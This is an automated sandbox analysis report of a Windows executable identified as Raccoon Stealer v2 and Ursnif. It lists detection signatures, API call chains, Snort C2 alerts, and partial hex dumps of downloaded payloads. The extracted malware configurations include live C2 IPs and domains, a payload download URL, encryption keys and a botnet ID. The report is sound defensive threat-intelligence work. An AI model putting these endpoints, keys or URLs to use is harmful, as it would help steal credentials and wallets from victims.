Windows Analysis Report
EJ6FBXJ9Dg.exe

Overview

General Information

Sample Name: EJ6FBXJ9Dg.exe
Analysis ID: 722131
MD5: 5949348fedecc598cdbce7072639231f
SHA1: a9a614ecb4871b57da47b32ce572c46493de6897
SHA256: 2fffec7d345d16c2480ea2f3f2e046e220488486c81cf7e1c14adfab890ec0b1
Tags: exeRecordBreaker
Infos:

Detection

Ursnif, Raccoon Stealer v2
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Ursnif
Antivirus detection for URL or domain
Antivirus detection for dropped file
Snort IDS alert for network traffic
Yara detected Raccoon Stealer v2
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: Dot net compiler compiles file from suspicious location
Antivirus / Scanner detection for submitted sample
Hooks registry keys query functions (used to hide registry keys)
Writes or reads registry keys via WMI
Found evasive API chain (may stop execution after checking system information)
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Found API chain indicative of debugger detection
Modifies the prolog of user mode functions (user mode inline hooks)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Modifies the import address table of user mode modules (user mode IAT hooks)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
PE file contains more sections than normal
Compiles C# or VB.Net code
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Extensive use of GetProcAddress (often used to hide API calls)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://qpdownloads.com/10103.exe Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Roaming\XHSRZM23.exe Avira: detection malicious, Label: TR/Crypt.XPACK.Gen7
Multi AV Scanner detection for submitted file
Source: EJ6FBXJ9Dg.exe Virustotal: Detection: 65% Perma Link
Source: EJ6FBXJ9Dg.exe Metadefender: Detection: 50% Perma Link
Antivirus / Scanner detection for submitted sample
Source: EJ6FBXJ9Dg.exe Avira: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\XHSRZM23.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 1.0.XHSRZM23.exe.400000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen7
Source: 1.2.XHSRZM23.exe.400000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen7
Source: 0.2.EJ6FBXJ9Dg.exe.af0000.4.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.0.EJ6FBXJ9Dg.exe.af0000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: EJ6FBXJ9Dg.exe Malware Configuration Extractor: Raccoon {"C2 url": ["http://188.127.227.51/"], "Bot ID": "b3ca3fc91779633a47981045668e09c4", "RC4_key1": "b3ca3fc91779633a47981045668e09c4"}
Source: 1.3.XHSRZM23.exe.13aa4a0.0.raw.unpack Malware Configuration Extractor: Ursnif {"RSA Public Key": "GEoaf/PsReruXzGPGUIgqWKnqoR7Hg9dOcT4nBssSx1nY9FAsRGi/E2tdzMI0njP6dLpZXQyBSxb2YN/N71RkIFe8BRQooe+s0DlXnJzyHYmt5vun+EavdlJKBsHKfikcIwJi8dHMcwPCVkp15cXW+FtNdcJ16MzDk0HRi26tZpwtGzsz5DaHHaw0yA6g52Dl8eUU+3S/MbS+zgMU3bd2jx4qwfKswaXM81OoMrm/tnuJLNFeIEk3OyzFEsObImHW4kh+539YoFhjTBOSMFqoVRYaZoeDOzojnXc0eoSRdCyTgvIwyzI4H4U/DMlfmvCLI5Axykns+KODb1pRLrq7RDL/5mrYprCWyjX3yV9fCU=", "c2_domain": ["trackingg-protectioon.cdn1.mozilla.net", "45.8.158.104", "trackingg-protectioon.cdn1.mozilla.net", "188.127.224.114", "weiqeqwns.com", "wdeiqeqwns.com", "weiqeqwens.com", "weiqewqwns.com", "iujdhsndjfks.com"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "YFVenkBsAbUmuHYi", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "movie_capture": "30, 8, *terminal* *wallet* *bank* *banco*", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "10103", "SetWaitableTimer_value": "1"}
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Code function: 0_2_00AF27F0 LocalAlloc,StrCpyW,LocalAlloc,LocalAlloc,LocalFree,CryptUnprotectData,CryptUnprotectData,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,LocalAlloc,PathCombineW,CopyFileW,CopyFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,lstrcpy,LocalAlloc,lstrcmp,LocalAlloc,wsprintfW,lstrlenW,lstrlenW,LocalFree,CryptUnprotectData,wsprintfW,lstrlenW,lstrlenW,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,LocalFree,LocalFree,DeleteFileW,LocalFree, 0_2_00AF27F0
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Code function: 0_2_00AF3252 LocalAlloc,StrCpyW,LocalAlloc,LocalAlloc,LocalFree,CryptUnprotectData,CryptUnprotectData,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,LocalAlloc,PathCombineW,CopyFileW,CopyFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,lstrcpy,LocalAlloc,lstrcmp,LocalAlloc,wsprintfW,lstrlenW,lstrlenW,LocalFree,CryptUnprotectData,wsprintfW,lstrlenW,lstrlenW,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,LocalFree,LocalFree,DeleteFileW,LocalFree, 0_2_00AF3252
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Code function: 0_2_00AF2CD1 LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,LocalFree,CryptUnprotectData,CryptUnprotectData,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,PathCombineW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,CopyFileW,CopyFileW,DeleteFileW,LocalFree,LocalFree,LocalAlloc,lstrcpy,LocalAlloc,lstrcmp,LocalAlloc,lstrcmpW,wsprintfW,lstrlenW,wsprintfW,lstrlenW,CryptUnprotectData,lstrcmpW,wsprintfW,lstrlenW,wsprintfW,lstrlenW,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW, 0_2_00AF2CD1
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Code function: 0_2_00AF1779 CryptBinaryToStringW,LocalAlloc,CryptBinaryToStringW,StrCpyW,LocalFree,LocalFree, 0_2_00AF1779
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Code function: 0_2_00AF17F4 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree, 0_2_00AF17F4
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Code function: 0_2_00AF6CDC LocalAlloc,CryptStringToBinaryA,lstrlen,CryptStringToBinaryA,MultiByteToWideChar,LocalAlloc,MultiByteToWideChar,StrCpyW,LocalFree,StrCpyW,StrCpyW,LocalFree, 0_2_00AF6CDC
Source: C:\Users\user\AppData\Roaming\XHSRZM23.exe Code function: 1_2_004647E5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 1_2_004647E5
Uses 32bit PE files
Source: EJ6FBXJ9Dg.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: EJ6FBXJ9Dg.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: freebl3.pdb source: freebl3.dll.0.dr
Source: Binary string: softokn3.pdbp source: softokn3.dll.0.dr
Source: Binary string: mozglue.pdb@+ source: mozglue.dll.0.dr
Source: Binary string: nss3.pdb source: nss3.dll.0.dr
Source: Binary string: mozglue.pdb source: mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\jv54rgf4.pdb source: powershell.exe, 00000007.00000002.564670153.0000024AACF7A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.0.dr
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Code function: 0_2_00AFBABB LocalAlloc,LocalFree,LocalAlloc,GetLogicalDriveStringsW,GetLogicalDriveStringsW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree, 0_2_00AFBABB
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Code function: 0_2_00AF6BAA FindFirstFileW,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalFree,FindNextFileW,FindNextFileW,FindClose,lstrlenW, 0_2_00AF6BAA
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Code function: 0_2_00AF1E12 LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,PathCombineW,StrCpyW,FindFirstFileW,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,LocalAlloc,StrCpyW,wsprintfW,PathCombineW,FindFirstFileW,FindFirstFileW,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree, 0_2_00AF1E12
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Code function: 0_2_00AFBCEC LocalAlloc,LocalAlloc,SHGetSpecialFolderPathW,lstrcmpW,StrCpyW,StrCpyW,FindFirstFileW,FindFirstFileW,LocalFree,LocalFree,lstrcmpW,lstrcmpW,LocalAlloc,LocalAlloc,PathCombineW,lstrcmpW,LocalAlloc,PathCombineW,LocalAlloc,LocalAlloc,SHGetSpecialFolderPathW,lstrlenW,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,LocalFree,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindNextFileW,LocalFree,LocalFree,FindClose, 0_2_00AFBCEC
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Code function: 0_2_00AF1968 FindFirstFileW,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalFree,FindNextFileW,FindNextFileW,FindClose,StrStrW,StrStrW,LocalAlloc,PathCombineW,lstrlenW, 0_2_00AF1968
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Code function: 0_2_00AF3F64 StrStrW,StrStrW,StrStrW,lstrlenW,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,LocalAlloc,lstrlenW,LocalAlloc,LocalAlloc,StrStrW,StrStrW,LocalAlloc,PathCombineW,LocalAlloc,FindFirstFileW,FindFirstFileW,StrStrW,LocalAlloc,StrCpyW,StrRChrW,StrRChrW,LocalAlloc,PathCombineW,LocalFree,LocalFree,FindNextFileW,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,StrStrW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree, 0_2_00AF3F64
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Code function: 0_2_00AF1AFF FindFirstFileW,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,StrStrW,lstrlenW,lstrlenW,LocalAlloc,PathCombineW,LocalFree,lstrlenW,FindNextFileW,FindNextFileW,FindClose, 0_2_00AF1AFF
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Code function: 0_2_00AF4272 StrStrW,StrStrW,StrStrW,lstrlenW,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,LocalAlloc,lstrlenW,LocalAlloc,LocalAlloc,StrStrW,StrStrW,LocalAlloc,PathCombineW,LocalAlloc,FindFirstFileW,FindFirstFileW,StrStrW,LocalAlloc,StrCpyW,StrRChrW,StrRChrW,LocalAlloc,PathCombineW,LocalFree,LocalFree,FindNextFileW,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,StrStrW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree, 0_2_00AF4272
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Code function: 0_2_00AFC05D LocalAlloc,StrCpyW,FindFirstFileW,FindFirstFileW,LocalAlloc,PathCombineW,LocalFree,LocalAlloc,PathCombineW,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,LocalAlloc,lstrlenW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CloseHandle,DeleteFileW,LocalAlloc,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,FindNextFileW,LocalFree,FindClose, 0_2_00AFC05D
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Code function: 0_2_00AF3CAC LocalAlloc,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,LocalAlloc,WideCharToMultiByte,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW, 0_2_00AF3CAC
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Code function: 0_2_00AF63BE LocalAlloc,StrCpyW,lstrlenW,FindFirstFileW,LocalFree,LocalAlloc,PathCombineW,LocalFree,LocalAlloc,StrCpyW,LocalAlloc,StrCpyW,LocalAlloc,LocalAlloc,lstrlenW,StrRChrW,StrCpyW,lstrlenW,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,CopyFileW,CreateFileW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,GetFileSize,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,LocalFree,FindClose, 0_2_00AF63BE
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Code function: 0_2_00AF5B3D LocalAlloc,StrCpyW,FindFirstFileW,LocalFree,LocalAlloc,PathCombineW,LocalAlloc,PathCombineW,LocalAlloc,StrCpyW,LocalAlloc,lstrlenW,LocalAlloc,CopyFileW,CreateFileW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,LocalFree,FindClose, 0_2_00AF5B3D
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Code function: 0_2_00AF7F03 LocalAlloc,LocalAlloc,LocalAlloc,PathCombineW,PathCombineW,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,ReadFile,lstrlen,StrStrA,lstrlen,StrStrA,LocalAlloc,FindFirstFileW,StrStrW,StrStrW,StrStrW,lstrlenW,lstrlenW,LocalAlloc,StrStrW,StrCpyW,LocalAlloc,PathCombineW,PathCombineW,LocalFree,FindNextFileW,FindClose,LocalFree,CloseHandle,DeleteFileW,LocalFree,DeleteFileW,LocalFree, 0_2_00AF7F03
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Code function: 0_2_00AF6F99 LocalAlloc,FindFirstFileW,StrStrW,LocalAlloc,PathCombineW,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,LocalAlloc,WideCharToMultiByte,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW, 0_2_00AF6F99
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Code function: 0_2_00AF39F4 LocalAlloc,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,LocalAlloc,WideCharToMultiByte,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW, 0_2_00AF39F4
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Code function: 0_2_00AF7248 LocalAlloc,StrCpyW,StrCpyW,FindFirstFileW,LocalAlloc,PathCombineW,lstrcmpW,LocalAlloc,LocalAlloc,LocalAlloc,StrCpyW,StrCpyW,StrCpyW,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree, 0_2_00AF7248

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2038916 ET TROJAN Win32/RecordBreaker - Observed UA M3 (TakeMyPainBack) 192.168.2.4:49697 -> 188.127.227.51:80
Source: Traffic Snort IDS: 2036934 ET TROJAN Win32/RecordBreaker CnC Checkin M1 192.168.2.4:49697 -> 188.127.227.51:80
Source: Traffic Snort IDS: 2036955 ET TROJAN Win32/RecordBreaker CnC Checkin - Server Response 188.127.227.51:80 -> 192.168.2.4:49697
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://188.127.227.51/
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Thu, 13 Oct 2022 06:48:01 GMTContent-Type: application/octet-streamContent-Length: 2042296Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:48 GMTETag: "62543db4-1f29b8"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f6 f1 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 e0 19 00 00 26 05 00 00 00 00 00 d0 01 15 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 60 1f 00 00 04 00 00 fd d1 1f 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f8 21 1d 00 5c 9d 00 00 54 bf 1d 00 40 01 00 00 00 40 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 b8 1f 00 00 00 50 1e 00 68 0a 01 00 68 fd 1c 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 f0 c4 1d 00 5c 04 00 00 94 21 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 69 de 19 00 00 10 00 00 00 e0 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e4 e9 03 00 00 f0 19 00 00 ea 03 00 00 e4 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 14 4e 00 00 00 e0 1d 00 00 2a 00 00 00 ce 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 30 1e 00 00 02 00 00 00 f8 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 1e 00 00 04 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0a 01 00 00 50 1e 00 00 0c 01 00 00 fe 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Thu, 13 Oct 2022 06:48:02 GMTContent-Type: application/octet-streamContent-Length: 449280Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:42 GMTETag: "62543dae-6db00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9b 28 c1 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 1f 84 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 00 3f 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
